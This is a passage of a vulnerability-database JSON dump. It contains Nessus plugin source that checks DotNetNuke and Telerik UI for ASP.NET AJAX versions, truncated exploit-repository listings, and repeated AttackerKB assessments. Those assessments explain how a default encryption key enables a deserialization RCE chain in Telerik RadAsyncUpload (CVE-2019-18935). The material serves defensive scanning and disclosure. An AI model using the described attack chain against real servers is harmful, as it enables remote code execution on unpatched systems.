self-reported version, the instance of Dotnetnuke running on the remote web server is 7.0.x prior to\n9.5.0. It is, therefore, affected by a XSS vulnerability.\n\n - For websites with user registration enabled, it is\n possible for a user to craft a registration that would\n inject malicious content to their profile that could\n expose information using an XSS style exploit.\n Mitigating Factors Websites not allowing registration\n will be unaffected by this issue. Fix(es) for This Issue\n Users must upgrade DNN Platform to version 9.5.0 or\n later to be protected from this issue. 
Affected Versions\n DNN Platform version 7.0.0 through 9.4.4 (2020-04)\n\nNote that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dotnetnuke version 9.5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19790\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dotnetnuke:dotnetnuke\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"dotnetnuke_detect.nasl\");\n script_require_keys(\"installed_sw/DNN\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'DNN';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, asp:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '7.0.0', 'max_version' : '9.4.4', 'fixed_version' : '9.5.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{'xss':TRUE});\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-11T16:40:18", "description": "According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 3.1.x prior to 9.6.0, 5.0.x prior to 9.6.0, 6.0.x prior to 9.6.0, or 7.0.x prior to 9.6.0. It is, therefore, affected by multiple vulnerabilities.\n\n - Modules that were discarded to the recycle bin were still able to respond to API calls to their endpoints, which could result in data uploads and other interactions that would go unnoticed since the module was not visually displayed. Mitigating Factors This only impacted modules that are using the WebAPI interface following the DNN Security protocols (which is a smaller subset of modules). Additionally, interactions are still bound by all other security rules, as if the module was placed on the page. 
Fix(es) for This Issue An upgrade to DNN Platform version 9.5.0 or later is required Affected Versions DNN Platform Versions 6.0.0 through 9.4.4 (2020-01)\n\n - A malicious user may be able to replace or update files with specific file extensions with content of their selection, without being authenticated to the website.\n Fix(es) for This Issue To remediate this issue an upgrade to DNN Platform Version (9.5.0 or later) is required. Affected Versions DNN Platform Versions 5.0.0 through 9.6.0 Acknowledgements The DNN Community thanks the following for identifying the issue and/or working with us to help protect Users Robbert Bosker of DotControl Digital Creatives Related CVE: CVE-2019-19790 (2020-02)\n\n - A number of older JavaScript libraries have been updated, closing multiple individual security notices.\n Fixes for the Issue Due to the nature of the elements included, and their usage with DNN Platform an upgrade to DNN Platform 9.5.0 or later is the only resolution for this issue.. Affected Versions DNN Platform version 6.0.0 through 9.4.4 (2020-03)\n\n - A malicious user may upload a file with a specific configuration and tell the DNN Platform to extract the file. This process could overwrite files that the user was not granted permissions to, and would be done without the notice of the administrator. Fix(es) for This Issue The only proper fix for this issue is to upgrade to DNN Platform 9.6.0 or later. Affected Versions DNN Platform version 5.0.0 through 9.5.0. (It is believed this may affect 3.x and 4.x installations as well, but has not been verified) (2020-05)\n\n - A malicious user may utilize a process to include in a message a file that they might not have had the permission to view/upload, and with the methods that the DNN File system works they may be able to gain access to this file. Mitigating Factors Installations configured using the Secure folder type would not have the file contents disclosed. 
This is the recommended manner to guarantee file security for confidential documents as it is the only method that provides a secure file check at download. Fix(es) for This Issue Upgrading to DNN Platform version 9.6.0 or later is required to mitigate this issue. Acknowledgements The DNN Community would like to thank the following for their assistance with this issue. Connor Neff Affected Versions DNN Platform version 7.0.0 through 9.5.0. (2020-06)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-03T00:00:00", "type": "nessus", "title": "Dotnetnuke 3.1.x < 9.6.0 / 5.0.x < 9.6.0 / 6.0.x < 9.6.0 / 7.0.x < 9.6.0 Multiple Vulnerabilities (09.06.00)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19790"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*"], "id": "DOTNETNUKE_9_6_0.NASL", "href": "https://www.tenable.com/plugins/nessus/137055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137055);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-19790\");\n\n script_name(english:\"Dotnetnuke 3.1.x < 9.6.0 / 5.0.x < 9.6.0 / 6.0.x < 9.6.0 / 7.0.x < 9.6.0 Multiple Vulnerabilities (09.06.00)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An ASP.NET application running on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 3.1.x prior to\n9.6.0, 5.0.x prior to 9.6.0, 6.0.x prior to 9.6.0, or 7.0.x prior to 9.6.0. 
It is, therefore, affected by multiple\nvulnerabilities.\n\n - Modules that were discarded to the recycle bin were\n still able to respond to API calls to their endpoints,\n which could result in data uploads and other\n interactions that would go unnoticed since the module\n was not visually displayed. Mitigating Factors This only\n impacted modules that are using the WebAPI interface\n following the DNN Security protocols (which is a smaller\n subset of modules). Additionally, interactions are still\n bound by all other security rules, as if the module was\n placed on the page. Fix(es) for This Issue An upgrade to\n DNN Platform version 9.5.0 or later is required Affected\n Versions DNN Platform Versions 6.0.0 through 9.4.4\n (2020-01)\n\n - A malicious user may be able to replace or update files\n with specific file extensions with content of their\n selection, without being authenticated to the website.\n Fix(es) for This Issue To remediate this issue an\n upgrade to DNN Platform Version (9.5.0 or later) is\n required. Affected Versions DNN Platform Versions 5.0.0\n through 9.6.0 Acknowledgements The DNN Community thanks\n the following for identifying the issue and/or working\n with us to help protect Users Robbert Bosker of\n DotControl Digital Creatives Related CVE: CVE-2019-19790\n (2020-02)\n\n - A number of older JavaScript libraries have been\n updated, closing multiple individual security notices.\n Fixes for the Issue Due to the nature of the elements\n included, and their usage with DNN Platform an upgrade\n to DNN Platform 9.5.0 or later is the only resolution\n for this issue.. Affected Versions DNN Platform version\n 6.0.0 through 9.4.4 (2020-03)\n\n - A malicious user may upload a file with a specific\n configuration and tell the DNN Platform to extract the\n file. This process could overwrite files that the user\n was not granted permissions to, and would be done\n without the notice of the administrator. 
Fix(es) for\n This Issue The only proper fix for this issue is to\n upgrade to DNN Platform 9.6.0 or later. Affected\n Versions DNN Platform version 5.0.0 through 9.5.0. (It\n is believed this may affect 3.x and 4.x installations as\n well, but has not been verified) (2020-05)\n\n - A malicious user may utilize a process to include in a\n message a file that they might not have had the\n permission to view/upload, and with the methods that the\n DNN File system works they may be able to gain access to\n this file. Mitigating Factors Installations configured\n using the Secure folder type would not have the file\n contents disclosed. This is the recommended manner to\n guarantee file security for confidential documents as it\n is the only method that provides a secure file check at\n download. Fix(es) for This Issue Upgrading to DNN\n Platform version 9.6.0 or later is required to mitigate\n this issue. Acknowledgements The DNN Community would\n like to thank the following for their assistance with\n this issue. Connor Neff Affected Versions DNN Platform\n version 7.0.0 through 9.5.0. 
(2020-06)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://nvd.nist.gov/vuln/detail/CVE-2019-19790\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dotnetnuke version 9.6.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19790\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dotnetnuke:dotnetnuke\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"dotnetnuke_detect.nasl\");\n script_require_keys(\"installed_sw/DNN\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'DNN';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, asp:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '3.1.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '5.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '6.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '7.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:54", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET is affected by a cryptographic weakness.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX Cryptographic Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9248"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112523", "href": "https://www.tenable.com/plugins/was/112523", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:25:18", "description": "The version of Telerik UI for ASP.NET AJAX 
installed on the remote Windows host is affected by a cryptographic weakness in Telerik.Web.UI.dll. An unauthenticated, remote attacker can exploit this, via specially crafted data, to disclose encryption keys.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX Cryptographic Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9248"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-9248.NASL", "href": "https://www.tenable.com/plugins/nessus/101159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101159);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-9248\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX Cryptographic Weakness\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the Windows remote\nhost is affected by a cryptographic weakness.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Telerik UI for ASP.NET AJAX installed on the remote\nWindows host is affected by a cryptographic weakness in\nTelerik.Web.UI.dll. 
An unauthenticated, remote attacker can exploit\nthis, via specially crafted data, to disclose encryption keys.\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4efdcfeb\");\n # http://www.telerik.com/support/whats-new/aspnet-ajax/release-history/ui-for-asp-net-ajax-r2-2017-sp1-version-2017-2-621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e5e7456\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R2 2017 SP1\n(2017.2.621) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9248\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\n\nfunction display_dword (dword, nox)\n{\n local_var tmp;\n\n if (isnull(nox) || (nox == FALSE))\n tmp = \"0x\";\n else\n tmp = \"\";\n\n return string (tmp,\n toupper(\n hexstr(\n raw_string(\n (dword >>> 24) & 0xFF,\n (dword >>> 16) & 0xFF,\n (dword >>> 8) & 0xFF,\n dword & 0xFF\n )\n )\n )\n );\n}\n\napp_name = \"Telerik UI for ASP.NET AJAX\";\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nweb_ui_dll = install['web_ui_dll'];\n\n# 2017.2.621 and later is patched\nif (ver_compare(ver:version, fix:\"2017.2.621\", strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2013.1.220 to 2017.2.503 have patches\n# 2011.1.315 to 2012.3.1308 might have patches\nif (((ver_compare(ver:version, fix:\"2013.1.220\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2017.2.503\", strict:FALSE) <= 0))\n ||\n ((ver_compare(ver:version, fix:\"2011.1.315\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2012.3.1308\", strict:FALSE) <= 0)))\n{\n # check for \"Telerik.Web.UI.Patch\" in the File Description\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if (!smb_session_init())\n audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:web_ui_dll);\n dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", string:web_ui_dll);\n\n rc = NetUseAdd(login:login, password:pass, 
domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n file_description = NULL;\n if (!isnull(fh))\n {\n ret = GetFileVersionEx(handle:fh);\n if (!isnull(ret)) children = ret['Children'];\n if (!isnull(children))\n {\n varfileinfo = children['VarFileInfo'];\n if (!isnull(varfileinfo))\n {\n translation =\n (get_word (blob:varfileinfo['Translation'], pos:0) << 16) +\n get_word (blob:varfileinfo['Translation'], pos:2);\n translation = tolower(display_dword(dword:translation, nox:TRUE));\n }\n stringfileinfo = children['StringFileInfo'];\n if (!isnull(stringfileinfo) && !isnull(translation))\n {\n data = stringfileinfo[translation];\n if (!isnull(data)) file_description = data['FileDescription'];\n else\n {\n data = stringfileinfo[toupper(translation)];\n if (!isnull(data)) file_description = data['FileDescription'];\n }\n }\n }\n CloseFile(handle:fh);\n }\n NetUseDel();\n\n if (empty_or_null(file_description))\n exit(1, \"Failed to get the file description of \" + web_ui_dll + \".\");\n\n if (file_description == \"Telerik.Web.UI.Patch\")\n exit(0, app_name + \" version \" + version + ' has the vendor supplied patch installed that changes the file description to \"Telerik.Web.UI.Patch\".');\n}\n\n# if we get this far, we're vulnerable\nport = get_kb_item(\"SMB/transport\");\nif (empty_or_null(port))\n port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", \"2017.2.621.0 or vendor supplied patch\"\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": 
"2021-12-29T23:42:45", "description": "# RAU_crypto\n[\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T02:57:38", "description": "<b>[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-19T17:11:02", "type": "githubexploit", "title": 
"Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-01-09T21:20:03", "id": "1741E720-F85A-5179-AB8A-D6FA2E185092", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-01-18T20:32:04", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. 
This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. 
Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. 
The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 